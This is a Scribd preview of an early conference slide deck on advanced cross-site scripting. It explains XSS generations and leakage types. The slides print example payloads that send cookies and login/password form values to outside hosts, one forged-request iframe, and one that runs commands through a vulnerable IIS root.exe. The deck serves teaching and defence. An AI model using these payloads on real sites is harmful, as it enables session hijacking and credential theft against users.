Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
1Activity
0 of .
Results for:
No results containing your search query
P. 1
Shmoocon XSS Proxy

Shmoocon XSS Proxy

Ratings:

5.0

(2)
|Views: 447|Likes:
Published by api-3849930

More info:

Published by: api-3849930 on Oct 19, 2008
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PPT, PDF, TXT or read online from Scribd
See more
See less

03/18/2014

pdf

text

original

Copyright\u00a9 2002 Avaya Inc. All rights reserved
Advanced Cross Site Scripting
Evil XSS
Anton Rager
2
Cross Site Scripting
\u20221st Gen XSS was against public sites and ran against everyone that
visited site
\u2013attacker uploads script content that everyone visiting page
execs
\u2013Popups, redirects other annoyances
\u2013Relayed cookies to attacker
\u20222nd Gen XSS focuses on sites that allow self-reflection XSS
\u2013User input modifies resulting page and can inject script
commands into returned page (site search and echoed results)
\u2013Normally chained with a 1st Gen attack on public site/email for
site redirection with redirection URL forcing a XSS on 2nd site
\u2013Cookies and other site-specific browser info leaked to attacker
3
Cross Site Scripting
\u2022Types of information leakage
\u2013Client can reveal cookies to 3rd party (session state, order info, etc)
\u2022http://host/a.php?variable="><script>document.location='http://www.cgise
curity.com/cgi-bin/cookie.cgi?
'%20+document.cookie</script>
\u2013Client can reveal posted form items to 3rd party (userID/passwd, etc)
\u2022<form> action="logoninformation.jsp" method="post"
onsubmit="hackImg=new Image;
hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.val
ue'+':'+ document.forms(1).password.value;" </form>
\u2013Client can be tricked into accessing/posting spoofed info to trusted
server
\u2022www.trustedserver.com/xss.asp?name = <iframe
src=http://www.trustedserver.com/auth_area/orderupdate?items=4000
></iframe>
\u2013Client can be tricked into attacking other sites
\u2022/hello.asp?name = <iframe
src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->